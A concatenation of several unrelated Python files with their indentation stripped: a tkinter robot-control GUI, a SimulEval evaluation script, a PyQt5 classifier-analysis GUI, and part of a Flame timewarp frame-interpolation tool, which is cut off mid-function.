Btn_LeftSide.bind('<ButtonRelease-1>', call_Turn_stop)
Btn_RightSide = tk.Button(root, width=8, text='-->',fg=color_text,bg=color_btn,relief='ridge')
Btn_RightSide.place(x=170,y=195)
Btn_RightSide.bind('<ButtonPress-1>', call_RightSide)
Btn_RightSide.bind('<ButtonRelease-1>', call_Turn_stop)
Btn0.place(x=100,y=195)
Btn1.place(x=100,y=230)
Btn2.place(x=30,y=230)
Btn3.place(x=170,y=230)
Btn0.bind('<ButtonPress-1>', call_forward)
Btn1.bind('<ButtonPress-1>', call_back)
Btn2.bind('<ButtonPress-1>', call_Left)
Btn3.bind('<ButtonPress-1>', call_Right)
Btn0.bind('<ButtonRelease-1>', call_FB_stop)
Btn1.bind('<ButtonRelease-1>', call_FB_stop)
Btn2.bind('<ButtonRelease-1>', call_Turn_stop)
Btn3.bind('<ButtonRelease-1>', call_Turn_stop)
root.bind('<KeyPress-w>', call_forward)
root.bind('<KeyPress-a>', call_Left)
root.bind('<KeyPress-d>', call_Right)
root.bind('<KeyPress-s>', call_back)
root.bind('<KeyPress-q>', call_LeftSide)
root.bind('<KeyPress-e>', call_RightSide)
root.bind('<KeyRelease-q>', call_Turn_stop)
root.bind('<KeyRelease-e>', call_Turn_stop)
root.bind('<KeyRelease-w>', call_FB_stop)
root.bind('<KeyRelease-a>', call_Turn_stop)
root.bind('<KeyRelease-d>', call_Turn_stop)
root.bind('<KeyRelease-s>', call_FB_stop)
Btn_up = tk.Button(root, width=8, text='Up',fg=color_text,bg=color_btn,relief='ridge')
Btn_down = tk.Button(root, width=8, text='Down',fg=color_text,bg=color_btn,relief='ridge')
Btn_left = tk.Button(root, width=8, text='Grab',fg=color_text,bg=color_btn,relief='ridge')
Btn_right = tk.Button(root, width=8, text='Loose',fg=color_text,bg=color_btn,relief='ridge')
Btn_home = tk.Button(root, width=8, text='Home',fg=color_text,bg=color_btn,relief='ridge')
Btn_up.place(x=400,y=195)
Btn_down.place(x=400,y=230)
Btn_left.place(x=330,y=230)
Btn_right.place(x=470,y=230)
Btn_home.place(x=250,y=230)
Btn_Cleft = tk.Button(root, width=8, text='\\',fg=color_text,bg=color_btn,relief='ridge')
Btn_Cright = tk.Button(root, width=8, text='/',fg=color_text,bg=color_btn,relief='ridge')
Btn_Cleft.place(x=330, y=195)
Btn_Cright.place(x=470, y=195)
root.bind('<KeyPress-u>', call_CLeft)
root.bind('<KeyPress-o>', call_CRight)
root.bind('<KeyPress-i>', call_headup)
root.bind('<KeyPress-k>', call_headdown)
root.bind('<KeyPress-j>', call_headleft)
root.bind('<KeyPress-l>', call_headright)
root.bind('<KeyPress-f>', call_headhome)
Btn_Cleft.bind('<ButtonPress-1>', call_CLeft)
Btn_Cright.bind('<ButtonPress-1>', call_CRight)
Btn_up.bind('<ButtonPress-1>', call_headup)
Btn_down.bind('<ButtonPress-1>', call_headdown)
Btn_left.bind('<ButtonPress-1>', call_headleft)
Btn_right.bind('<ButtonPress-1>', call_headright)
Btn_home.bind('<ButtonPress-1>', call_headhome)
Btn14= tk.Button(root, width=8,height=2, text='Connect',fg=color_text,bg=color_btn,command=connect_click,relief='ridge')
Btn14.place(x=315,y=15) #Define a Button and put it in position
root.bind('<Return>', connect)
var_R = tk.StringVar()
var_R.set(0)
Scale_R = tk.Scale(root,label=None,
from_=0,to=255,orient=tk.HORIZONTAL,length=505,
showvalue=1,tickinterval=None,resolution=1,variable=var_R,troughcolor='#F44336',command=set_R,fg=color_text,bg=color_bg,highlightthickness=0)
Scale_R.place(x=30,y=330) #Define a Scale and put it in position
var_G = tk.StringVar()
var_G.set(0)
Scale_G = tk.Scale(root,label=None,
from_=0,to=255,orient=tk.HORIZONTAL,length=505,
showvalue=1,tickinterval=None,resolution=1,variable=var_G,troughcolor='#00E676',command=set_G,fg=color_text,bg=color_bg,highlightthickness=0)
Scale_G.place(x=30,y=360) #Define a Scale and put it in position
var_B = tk.StringVar()
var_B.set(0)
Scale_B = tk.Scale(root,label=None,
from_=0,to=255,orient=tk.HORIZONTAL,length=505,
showvalue=1,tickinterval=None,resolution=1,variable=var_B,troughcolor='#448AFF',command=set_B,fg=color_text,bg=color_bg,highlightthickness=0)
Scale_B.place(x=30,y=390) #Define a Scale and put it in position
canvas_cover=tk.Canvas(root,bg=color_bg,height=30,width=510,highlightthickness=0)
canvas_cover.place(x=30,y=420)
Btn_Steady = tk.Button(root, width=10, text='Ultrasonic',fg=color_text,bg=color_btn,relief='ridge')
Btn_Steady.place(x=30,y=445)
root.bind('<KeyPress-z>', call_steady)
Btn_Steady.bind('<ButtonPress-1>', call_steady)
Btn_FindColor = tk.Button(root, width=10, text='FindColor',fg=color_text,bg=color_btn,relief='ridge')
Btn_FindColor.place(x=115,y=445)
root.bind('<KeyPress-z>', call_FindColor)
Btn_FindColor.bind('<ButtonPress-1>', call_FindColor)
Btn_WatchDog = tk.Button(root, width=10, text='WatchDog',fg=color_text,bg=color_btn,relief='ridge')
Btn_WatchDog.place(x=200,y=445)
root.bind('<KeyPress-z>', call_WatchDog)
Btn_WatchDog.bind('<ButtonPress-1>', call_WatchDog)
Btn_Fun4 = tk.Button(root, width=10, text='FindLine',fg=color_text,bg=color_btn,relief='ridge')
Btn_Fun4.place(x=285,y=445)
root.bind('<KeyPress-z>', call_FindLine)
Btn_Fun4.bind('<ButtonPress-1>', call_FindLine)
Btn_Fun5 = tk.Button(root, width=10, text='Function 5',fg=color_text,bg=color_btn,relief='ridge')
Btn_Fun5.place(x=370,y=445)
root.bind('<KeyPress-z>', call_WatchDog)
Btn_Fun5.bind('<ButtonPress-1>', call_WatchDog)
Btn_Fun6 = tk.Button(root, width=10, text='Function 6',fg=color_text,bg=color_btn,relief='ridge')
Btn_Fun6.place(x=455,y=445)
root.bind('<KeyPress-z>', call_WatchDog)
Btn_Fun6.bind('<ButtonPress-1>', call_WatchDog)
ins_threading=thread.Thread(target=instruction) #Define a thread for FPV and OpenCV
ins_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
ins_threading.start() #Thread starts
global stat
if stat==0: # Ensure the mainloop runs only once
root.mainloop() # Run the mainloop()
stat=1 # Change the value to '1' so the mainloop() would not run again.
if __name__ == '__main__':
try:
loop() # Load GUI
except:
tcpClicSock.close() # Close socket or it may not connect with the server again
footage_socket.close()
cv2.destroyAllWindows()
pass
|
simuleval_cli.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
try:
from simuleval import READ_ACTION, WRITE_ACTION, options
from simuleval.cli import DataWriter, server
from simuleval.online import start_client, start_server
from simuleval.utils.agent_finder import find_agent_cls
from simuleval.utils.functional import split_list_into_chunks
except ModuleNotFoundError:
pass
import importlib
import json
import logging
import os
import sys
import time
from functools import partial
from multiprocessing import Manager, Pool, Process
from neurst.utils.registry import get_registered_class
logging.basicConfig(
format='%(asctime)s | %(levelname)-8s | %(name)-16s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
stream=sys.stderr,
)
logger = logging.getLogger('simuleval.cli')
# added here
def init():
global tf
import tensorflow as tf
tf.config.experimental.set_memory_growth(tf.config.experimental.list_physical_devices('GPU')[0], True)
def evaluate(args, client, server_process=None):
info = client.corpus_info()
num_sentences = info['num_sentences']
indices = list(range(num_sentences))
num_processes = args.num_processes
manager = Manager()
result_queue = manager.Queue()
data_writer = DataWriter(args, result_queue)
if num_processes > 1:
if num_processes > num_sentences:
logger.warn(
f"Number of processes is larger than the number of sentences ({num_processes}, {num_sentences}). "
f"Will only use {num_sentences} processes"
)
num_processes = num_sentences
# Multi process, split test set into num_processes pieces
# added here
with Pool(args.num_processes, initializer=init) as p:
p.map(
partial(decode, args, client, result_queue),
split_list_into_chunks(indices, num_processes),
)
else:
decode(args, client, result_queue, indices)
scores = client.get_scores()
logger.info("Evaluation results:\n" + json.dumps(scores, indent=4))
logger.info("Evaluation finished")
data_writer.write_scores(scores)
data_writer.kill()
if server_process is not None:
server_process.kill()
logger.info("Shutdown server")
def decode(args, client, result_queue, instance_ids):
# Find agent and load related arguments
if os.path.exists(args.agent):
agent_name, agent_cls = find_agent_cls(args)
else:
agent_cls = get_registered_class(args.agent, "simuleval_agent")
agent_name = agent_cls.__name__
logger.info(
f"Evaluating {agent_name} (process id {os.getpid()}) "
f"on instances from {instance_ids[0]} to {instance_ids[-1]}"
)
parser = options.general_parser()
options.add_agent_args(parser, agent_cls)
args, _ = parser.parse_known_args()
# Data type check
info = client.corpus_info()
data_type = info['data_type']
if data_type != agent_cls.data_type:
logger.error(
f"Data type mismatch 'server.data_type: {data_type}', "
f"'{agent_name}.data_type: {agent_cls.data_type}'")
sys.exit(1)
# build agents
agent = agent_cls(args)
# Decode
for instance_id in instance_ids:
states = agent.build_states(args, client, instance_id)
while not states.finish_hypo():
action = agent.policy(states)
if action == READ_ACTION:
states.update_source()
elif action == WRITE_ACTION:
prediction = agent.predict(states)
states.update_target(prediction)
else:
raise SystemExit(f"Undefined action name {action}")
sent_info = client.get_scores(instance_id)
result_queue.put(sent_info)
logger.debug(f"Instance {instance_id} finished, results:\n{json.dumps(sent_info, indent=4)}")
def _main(client_only=False):
parser = options.general_parser()
options.add_server_args(parser)
if not client_only:
options.add_data_args(parser)
args, _ = parser.parse_known_args()
if not client_only:
if os.path.exists(args.agent):
_, agent_cls = find_agent_cls(args)
else:
agent_cls = get_registered_class(args.agent, "simuleval_agent")
if args.data_type is None:
args.data_type = agent_cls.data_type
logging.getLogger("tornado.access").setLevel(logging.WARNING)
server_process = Process(
target=start_server, args=(args,))
server_process.start()
time.sleep(3)
else:
server_process = None
client = start_client(args)
evaluate(args, client, server_process)
if __name__ == "__main__":
try:
import simuleval
importlib.import_module("neurst.utils.simuleval_agents")
_ = simuleval
except ModuleNotFoundError:
raise ModuleNotFoundError(
"Please install simuleval via: \n"
"\tgit clone https://github.com/facebookresearch/SimulEval.git\n"
"\tpip3 install -e SimulEval/")
parser = options.general_parser()
options.add_server_args(parser)
args, _ = parser.parse_known_args()
if not args.server_only:
_main(args.client_only)
else:
server()
|
dagr_rev02.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 6 16:25:14 2019
@author: adsims
"""
from PyQt5.uic import loadUiType
import sys
from PyQt5 import QtWidgets, QtCore, uic
import numpy as np
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import (
FigureCanvasQTAgg as FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
import threading
import dagr_backend
__author__ = "Andrew Sims, Michael Hudson"
__copyright__ = "None"
__license__ = "None"
__version__ = "0.2"
__maintainer__ = "Andrew Sims, Michael Hudson"
__email__ = "andrew.sims.d@gmail.com"
__status__ = "Prototype"
Ui_MainWindow, QMainWindow = loadUiType('DAGR.ui')
class Gui(QMainWindow, Ui_MainWindow):
def __init__(self, ):
super(Gui, self).__init__()
self.setupUi(self)
self.dataset_fig_dict = {}
self.algorithim_fig_dict = {}
self.learning_curve_fig_dict = {}
self.pb_begin_analysis = self.findChild(QtWidgets.QPushButton, 'pb_begin_analysis')
self.pb_begin_analysis.clicked.connect(self.begin_analysis)
self.cb_feature_box_and_whisker = self.findChild(QtWidgets.QCheckBox, 'cb_feature_box_and_whisker')
self.cb_correlation_matrix = self.findChild(QtWidgets.QCheckBox, 'cb_correlation_matrix')
self.cb_feature_histogram = self.findChild(QtWidgets.QCheckBox, 'cb_feature_histogram')
self.cb_raw_features = self.findChild(QtWidgets.QCheckBox, 'cb_raw_features')
self.cb_scatter_matrix = self.findChild(QtWidgets.QCheckBox, 'cb_scatter_matrix')
# self.html_viewer = self.findChild(QtWebEngineWidgets.QWebEngineView, 'webEngineView')
self.dataset_prog = self.findChild(QtWidgets.QProgressBar, 'dataset_prog')
self.algorithim_prog = self.findChild(QtWidgets.QProgressBar, 'algorithim_prog')
self.cb_adaboost = self.findChild(QtWidgets.QCheckBox, 'cb_adaboost')
self.cb_dtc = self.findChild(QtWidgets.QCheckBox, 'cb_dtc')
self.cb_gaussian_process = self.findChild(QtWidgets.QCheckBox, 'cb_gaussian_process')
self.cb_linear_svm = self.findChild(QtWidgets.QCheckBox, 'cb_linear_svm')
self.cb_naive_bayes = self.findChild(QtWidgets.QCheckBox, 'cb_naive_bayes')
self.cb_nearest_neighbors = self.findChild(QtWidgets.QCheckBox, 'cb_nearest_neighbors')
self.cb_neural_network = self.findChild(QtWidgets.QCheckBox, 'cb_neural_network')
self.cb_qda = self.findChild(QtWidgets.QCheckBox, 'cb_qda')
self.cb_random_forest = self.findChild(QtWidgets.QCheckBox, 'cb_random_forest')
self.cb_rbf_svm = self.findChild(QtWidgets.QCheckBox, 'cb_rbf_svm')
self.dataset_mpl_figs.itemClicked.connect(self.dataset_changefig)
self.algorithim_mpl_figs.itemClicked.connect(self.algorithim_changefig)
self.learning_curve_mpl_figs.itemClicked.connect(self.learning_curve_changefig)
datset_base_fig = Figure()
self.dataset_addmpl(datset_base_fig)
algorithim_base_fig = Figure()
self.algorithim_addmpl(algorithim_base_fig)
learning_curve_base_fig = Figure()
self.learning_curve_addmpl(learning_curve_base_fig)
def begin_analysis(self,):
# with open(r'C:/Users/andre/Documents/Data Analysis/bokeh_test_file.html', 'r') as fh:
# file = fh.read()
# self.html_viewer.setHtml(file)
df, feature_names = dagr_backend.gen_dataset()
dataset_figs = {}
if self.cb_feature_box_and_whisker.isChecked():
dataset_figs['Feature Box Plot'] = dagr_backend.plot_feature_box(df, feature_names)
if self.cb_correlation_matrix.isChecked():
dataset_figs['Correlation Matrix'] = dagr_backend.plot_corr_mat(df, feature_names)
if self.cb_feature_histogram.isChecked():
dataset_figs['Histograms'] = dagr_backend.plot_histograms(df, feature_names)
if self.cb_raw_features.isChecked():
dataset_figs['Raw Features'] = dagr_backend.plot_raw_features(df, feature_names)
if self.cb_scatter_matrix.isChecked():
dataset_figs['Scatter Matrix'] = dagr_backend.plot_scatter_matrix(df, feature_names)
algorithims_to_use = []
if self.cb_adaboost.isChecked():
algorithims_to_use.append('adaboost')
if self.cb_dtc.isChecked():
algorithims_to_use.append('dtc')
if self.cb_gaussian_process.isChecked():
algorithims_to_use.append('gaussian_process')
if self.cb_linear_svm.isChecked():
algorithims_to_use.append('linear_svm')
if self.cb_naive_bayes.isChecked():
algorithims_to_use.append('naive_bayes')
if self.cb_nearest_neighbors.isChecked():
algorithims_to_use.append('nearest_neighbors')
if self.cb_neural_network.isChecked():
algorithims_to_use.append('neural_network')
if self.cb_qda.isChecked():
algorithims_to_use.append('qda')
if self.cb_random_forest.isChecked():
algorithims_to_use.append('random_forest')
if self.cb_rbf_svm.isChecked():
algorithims_to_use.append('rbf_svm')
models = dagr_backend.build_models(df, feature_names, algorithims_to_use)
algorithim_fig_list = []
learning_curve_fig_list = []
algorithim_fig_list.append(('Algorithim Accuracy', dagr_backend.plot_algorithim_accuracy(df, feature_names, models)))
for model in models:
model_name = model.steps[-1][0]
# x = threading.Thread(target=self.append_figure(), args=(algorithim_fig_list, model_name, dagr_backend.plot_algorithim_class_space(), (df, feature_names, model)))
# x.start()
algorithim_fig_list.append((model_name, dagr_backend.plot_algorithim_class_space(df, feature_names, model)))
learning_curve_fig_list.append(
(
model_name,
dagr_backend.plot_learning_curve_(df, feature_names, model)
)
)
for i, (name, figure) in enumerate(dataset_figs.items()):
self.dataset_prog.setValue(((i+1)/len(dataset_figs))*100)
gui.dataset_addfig(name, figure)
for i, (name, figure) in enumerate(algorithim_fig_list):
self.algorithim_prog.setValue(((i+1)/len(algorithim_fig_list))*100)
gui.algorithim_addfig(name, figure)
for name, figure in learning_curve_fig_list:
gui.learning_curve_addfig(name, figure)
def append_figure(self, lst, model_name, func, func_args):
lst.append((model_name, func(*func_args)))
def dataset_changefig(self, item):
text = item.text()
self.dataset_rmmpl()
self.dataset_addmpl(self.dataset_fig_dict[text])
def dataset_addfig(self, name, fig):
self.dataset_fig_dict[name] = fig
self.dataset_mpl_figs.addItem(name)
def dataset_addmpl(self, fig):
self.dataset_canvas = FigureCanvas(fig)
self.dataset_mplvl.addWidget(self.dataset_canvas)
self.dataset_canvas.draw()
self.toolbar = NavigationToolbar(self.dataset_canvas,
self.dataset_mpl_window, coordinates=True)
self.dataset_mplvl.addWidget(self.toolbar)
def dataset_rmmpl(self,):
self.dataset_mplvl.removeWidget(self.dataset_canvas)
self.dataset_canvas.close()
self.dataset_mplvl.removeWidget(self.toolbar)
self.toolbar.close()
def algorithim_changefig(self, item):
text = item.text()
self.algorithim_rmmpl()
self.algorithim_addmpl(self.algorithim_fig_dict[text])
def algorithim_addfig(self, name, fig):
self.algorithim_fig_dict[name] = fig
self.algorithim_mpl_figs.addItem(name)
def algorithim_addmpl(self, fig):
self.algorithim_canvas = FigureCanvas(fig)
self.algorithim_mplvl.addWidget(self.algorithim_canvas)
self.algorithim_canvas.draw()
self.toolbar = NavigationToolbar(self.algorithim_canvas,
self.algorithim_mpl_window, coordinates=True)
self.algorithim_mplvl.addWidget(self.toolbar)
def algorithim_rmmpl(self,):
self.algorithim_mplvl.removeWidget(self.algorithim_canvas)
self.algorithim_canvas.close()
self.algorithim_mplvl.removeWidget(self.toolbar)
self.toolbar.close()
def learning_curve_changefig(self, item):
text = item.text()
self.learning_curve_rmmpl()
self.learning_curve_addmpl(self.learning_curve_fig_dict[text])
def learning_curve_addfig(self, name, fig):
self.learning_curve_fig_dict[name] = fig
self.learning_curve_mpl_figs.addItem(name)
def learning_curve_addmpl(self, fig):
self.learning_curve_canvas = FigureCanvas(fig)
self.learning_curve_mplvl.addWidget(self.learning_curve_canvas)
self.learning_curve_canvas.draw()
self.toolbar = NavigationToolbar(self.learning_curve_canvas,
self.learning_curve_mpl_window, coordinates=True)
self.learning_curve_mplvl.addWidget(self.toolbar)
def learning_curve_rmmpl(self,):
self.learning_curve_mplvl.removeWidget(self.learning_curve_canvas)
self.learning_curve_canvas.close()
self.learning_curve_mplvl.removeWidget(self.toolbar)
self.toolbar.close()
def closeEvent(self, ce):
#prevents blocking after each run
QtWidgets.QApplication.quit()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
app.processEvents()
gui = Gui()
gui.show()
sys.exit(app.exec_())
|
inference_flame_tw.py
|
from ntpath import basename
import os
import sys
import cv2
import torch
import argparse
import numpy as np
from tqdm import tqdm
from torch.nn import functional as F
import warnings
import _thread
from queue import Queue, Empty
from pprint import pprint, pformat
import time
import psutil
import signal
import multiprocessing as mp
import inference_common
warnings.filterwarnings("ignore")
IOThreadsFlag = True
IOProcesses = []
cv2.setNumThreads(1)
# Exception handler
def exception_handler(exctype, value, tb):
import traceback
locks = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'locks')
cmd = 'rm -f ' + locks + '/*'
# os.system(cmd)
pprint('%s in %s' % (value, exctype))
pprint(traceback.format_exception(exctype, value, tb))
sys.__excepthook__(exctype, value, tb)
input("Press Enter to continue...")
sys.excepthook = exception_handler
# ctrl+c handler
def signal_handler(sig, frame):
global IOThreadsFlag
IOThreadsFlag = False
time.sleep(0.1)
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def clear_write_buffer(args, write_buffer, output_duration):
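# Added note: consumes (frame_number, image) tuples from write_buffer and writes
# them out as EXR files; an item with frame_number == -1 is the sentinel that
# ends the render loop and flips IOThreadsFlag off.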
global IOThreadsFlag
global IOProcesses
cv2_flags = []
if args.bit_depth != 32:
cv2_flags = [cv2.IMWRITE_EXR_TYPE, cv2.IMWRITE_EXR_TYPE_HALF]
number_of_write_threads = 4
print('rendering %s frames to %s' % (output_duration, args.output))
pbar = tqdm(total=output_duration, unit='frame')
while IOThreadsFlag:
alive_processes = []
for process in IOProcesses:
if process.is_alive():
alive_processes.append(process)
else:
process.join(timeout=0)
IOProcesses = list(alive_processes)
item = write_buffer.get()
frame_number, image_data = item
if frame_number == -1:
pbar.close() # type: ignore
IOThreadsFlag = False
break
path = os.path.join(os.path.abspath(args.output), '{:0>7d}.exr'.format(frame_number))
if len(IOProcesses) < number_of_write_threads:
try:
p = mp.Process(target=cv2.imwrite, args=(path, image_data[:, :, ::-1], cv2_flags, ))
p.start()
IOProcesses.append(p)
except:
try:
cv2.imwrite(path, image_data[:, :, ::-1], cv2_flags)
except Exception as e:
print ('Error writing %s: %s' % (path, e))
else:
try:
cv2.imwrite(path, image_data[:, :, ::-1], cv2_flags)
except Exception as e:
print ('Error writing %s: %s' % (path, e))
pbar.update(1)
def build_read_buffer(user_args, read_buffer, videogen):
global IOThreadsFlag
for frame in videogen:
frame_data = cv2.imread(os.path.join(user_args.input, frame), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
read_buffer.put(frame_data)
read_buffer.put(None)
def make_inference_rational(model, I0, I1, ratio, rthreshold=0.02, maxcycles=5, scale=1.0, always_interp=False):
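# Added note: iterative bisection towards the requested ratio -- each cycle
# synthesizes the frame halfway between I0 and I1 and narrows the interval
# until the midpoint ratio is within rthreshold/2 of ratio or maxcycles is hit.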
I0_ratio = 0.0
I1_ratio = 1.0
rational_m = torch.mean(I0) * ratio + torch.mean(I1) * (1 - ratio)
if not always_interp:
if ratio <= I0_ratio + rthreshold / 2:
return I0
if ratio >= I1_ratio - rthreshold / 2:
return I1
for inference_cycle in range(0, maxcycles):
middle = model.inference(I0, I1, scale)
middle_ratio = (I0_ratio + I1_ratio) / 2
if not always_interp:
if ratio - (rthreshold / 2) <= middle_ratio <= ratio + (rthreshold / 2):
return middle # + (rational_m - torch.mean(middle)).expand_as(middle)
if ratio > middle_ratio:
I0 = middle
I0_ratio = middle_ratio
else:
I1 = middle
I1_ratio = middle_ratio
return middle # + (rational_m - torch.mean(middle)).expand_as(middle)
def make_inference_rational_cpu(model, I0, I1, ratio, frame_num, w, h, write_buffer, rthreshold=0.02, maxcycles=8, scale=1.0, always_interp=False):
device = torch.device("cpu")
torch.set_grad_enabled(False)
I0_ratio = 0.0
I1_ratio = 1.0
rational_m = torch.mean(I0) * ratio + torch.mean(I1) * (1 - ratio)
if not always_interp:
if ratio <= I0_ratio + rthreshold / 2:
I0 = (((I0[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, I0[:h, :w]))
return
if ratio >= I1_ratio - rthreshold / 2:
I1 = (((I1[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, I1[:h, :w]))
return
for inference_cycle in range(0, maxcycles):
middle = model.inference(I0, I1, scale)
middle_ratio = (I0_ratio + I1_ratio) / 2
if not always_interp:
if ratio - (rthreshold / 2) <= middle_ratio <= ratio + (rthreshold / 2):
# middle = middle + (rational_m - torch.mean(middle)).expand_as(middle)
middle = (((middle[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, middle[:h, :w]))
return
if ratio > middle_ratio:
middle = middle.detach()
I0 = middle.to(device, non_blocking=True)
I0_ratio = middle_ratio
else:
middle = middle.detach()
I1 = middle.to(device, non_blocking=True)
I1_ratio = middle_ratio
# middle + (rational_m - torch.mean(middle)).expand_as(middle)
middle = (((middle[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, middle[:h, :w]))
return
def dictify(r, root=True):
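# Added note: recursively converts an ElementTree node into nested dicts --
# attributes become keys, node text is stored under '_text', and each child
# tag maps to a list of child dicts.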
from copy import copy
if root:
return {r.tag: dictify(r, False)}
d = copy(r.attrib)
if r.text:
d["_text"] = r.text
for x in r.findall("./*"):
if x.tag not in d:
d[x.tag] = []
d[x.tag].append(dictify(x, False))
return d
def bake_flame_tw_setup(tw_setup_path, start, end):
# parses tw setup from flame and returns dictionary
# with baked frame - value pairs
def extrapolate_linear(xa, ya, xb, yb, xc):
m = (ya - yb) / (xa - xb)
yc = (xc - xb) * m + yb
return yc
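# Worked example (illustrative): extrapolate_linear(0, 0, 1, 2, 3) == 6 --
# the line through (0, 0) and (1, 2) has slope 2, so at x = 3 it reaches 6.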
import xml.etree.ElementTree as ET
frame_value_map = {}
with open(tw_setup_path, 'r') as tw_setup_file:
tw_setup_string = tw_setup_file.read()
tw_setup_file.close()
tw_setup_xml = ET.fromstring(tw_setup_string)
tw_setup = dictify(tw_setup_xml)
# start = int(tw_setup['Setup']['Base'][0]['Range'][0]['Start'])
# end = int(tw_setup['Setup']['Base'][0]['Range'][0]['End'])
# TW_Timing_size = int(tw_setup['Setup']['State'][0]['TW_Timing'][0]['Channel'][0]['Size'][0]['_text'])
TW_SpeedTiming_size = int(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['Size'][0]['_text'])
TW_RetimerMode = int(tw_setup['Setup']['State'][0]['TW_RetimerMode'][0]['_text'])
parsed_and_baked_path = os.path.join(os.path.dirname(args.setup), 'parsed_and_baked.txt')
if sys.platform == 'darwin':
parser_and_baker = os.path.join(os.path.dirname(__file__), 'flame_channel_parser', 'bin', 'bake_flame_channel_mac')
else:
parser_and_baker = os.path.join(os.path.dirname(__file__), 'flame_channel_parser', 'bin', 'bake_flame_channel')
if TW_SpeedTiming_size == 1 and TW_RetimerMode == 0:
# just constant speed change with no keyframes set
x = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['Frame'][0]['_text'])
y = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['Value'][0]['_text'])
ldx = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['LHandle_dX'][0]['_text'])
ldy = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['LHandle_dY'][0]['_text'])
rdx = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['RHandle_dX'][0]['_text'])
rdy = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['RHandle_dY'][0]['_text'])
for frame_number in range(start, end+1):
frame_value_map[frame_number] = extrapolate_linear(x + ldx, y + ldy, x + rdx, y + rdy, frame_number)
return frame_value_map
# add point tangents from vectors to match the older version of the setup
# used by Julik's parser
from xml.dom import minidom
xml = minidom.parse(tw_setup_path)
keys = xml.getElementsByTagName('Key')
for key in keys:
frame = key.getElementsByTagName('Frame')
if frame:
frame = (frame[0].firstChild.nodeValue)
value = key.getElementsByTagName('Value')
if value:
value = (value[0].firstChild.nodeValue)
rdx = key.getElementsByTagName('RHandle_dX')
if rdx:
rdx = (rdx[0].firstChild.nodeValue)
rdy = key.getElementsByTagName('RHandle_dY')
if rdy:
rdy = (rdy[0].firstChild.nodeValue)
ldx = key.getElementsByTagName('LHandle_dX')
if ldx:
ldx = (ldx[0].firstChild.nodeValue)
ldy = key.getElementsByTagName('LHandle_dY')
if ldy:
ldy = (ldy[0].firstChild.nodeValue)
lx = xml.createElement('LHandleX')
lx.appendChild(xml.createTextNode('{:.6f}'.format(float(frame) + float(ldx))))
key.appendChild(lx)
ly = xml.createElement('LHandleY')
ly.appendChild(xml.createTextNode('{:.6f}'.format(float(value) + float(ldy))))
key.appendChild(ly)
rx = xml.createElement('RHandleX')
rx.appendChild(xml.createTextNode('{:.6f}'.format(float(frame) + float(rdx))))
key.appendChild(rx)
ry = xml.createElement('RHandleY')
ry.appendChild(xml.createTextNode('{:.6f}'.format(float(value) + float(rdy))))
key.appendChild(ry)
xml_string = xml.toxml()
dirname, name = os.path.dirname(tw_setup_path), os.path.basename(tw_setup_path)
xml_path = os.path.join(dirname, 'fix_' + name)
with open(xml_path, 'w') as xml_file:
xml_file.write(xml_string)
xml_file.close()
intp_start = start
intp_end = end
if TW_RetimerMode == 0:
tw_speed = {}
tw_speed_frames = []
TW_Speed = xml.getElementsByTagName('TW_Speed')
keys = TW_Speed[0].getElementsByTagName('Key')
for key in keys:
index = key.getAttribute('Index')
frame = key.getElementsByTagName('Frame')
if frame:
frame = (frame[0].firstChild.nodeValue)
value = key.getElementsByTagName('Value')
if value:
value = (value[0].firstChild.nodeValue)
tw_speed[int(index)] = {'frame': int(frame), 'value': float(value)}
tw_speed_frames.append(int(frame))
intp_start = min(start, min(tw_speed_frames))
intp_end = max(end, max(tw_speed_frames))
else:
tw_timing = {}
tw_timing_frames = []
TW_Timing = xml.getElementsByTagName('TW_Timing')
keys = TW_Timing[0].getElementsByTagName('Key')
for key in keys:
index = key.getAttribute('Index')
frame = key.getElementsByTagName('Frame')
if frame:
frame = (frame[0].firstChild.nodeValue)
value = key.getElementsByTagName('Value')
if value:
value = (value[0].firstChild.nodeValue)
tw_timing[int(index)] = {'frame': int(frame), 'value': float(value)}
tw_timing_frames.append(int(frame))
intp_start = min(start, min(tw_timing_frames))
intp_end = max(end, max(tw_timing_frames))
tw_channel_name = 'Speed' if TW_RetimerMode == 0 else 'Timing'
cmd = parser_and_baker + ' -c ' + tw_channel_name
cmd += ' -s ' + str(intp_start) + ' -e ' + str(intp_end)
cmd += ' --to-file ' + parsed_and_baked_path + ' ' + xml_path
os.system(cmd)
if not os.path.isfile(parsed_and_baked_path):
print ('can not find parsed channel file %s' % parsed_and_baked_path)
input("Press Enter to continue...")
sys.exit(1)
tw_channel = {}
with open(parsed_and_baked_path, 'r') as parsed_and_baked:
import re
# taken from Julik's parser
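# Illustrative examples of lines the record below should match: "12\t0.5"
# or "-42\t1.25" -- group(1) is the frame number, group(2) the value.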
CORRELATION_RECORD = re.compile(
r"""
^([-]?\d+) # -42 or 42
\t # tab
(
[-]?(\d+(\.\d*)?) # "-1" or "1" or "1.0" or "1."
| # or:
\.\d+ # ".2"
)
